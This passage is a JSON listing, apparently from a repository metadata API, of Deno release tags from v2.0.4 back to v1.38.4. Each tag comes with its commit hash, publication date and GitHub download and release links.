"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job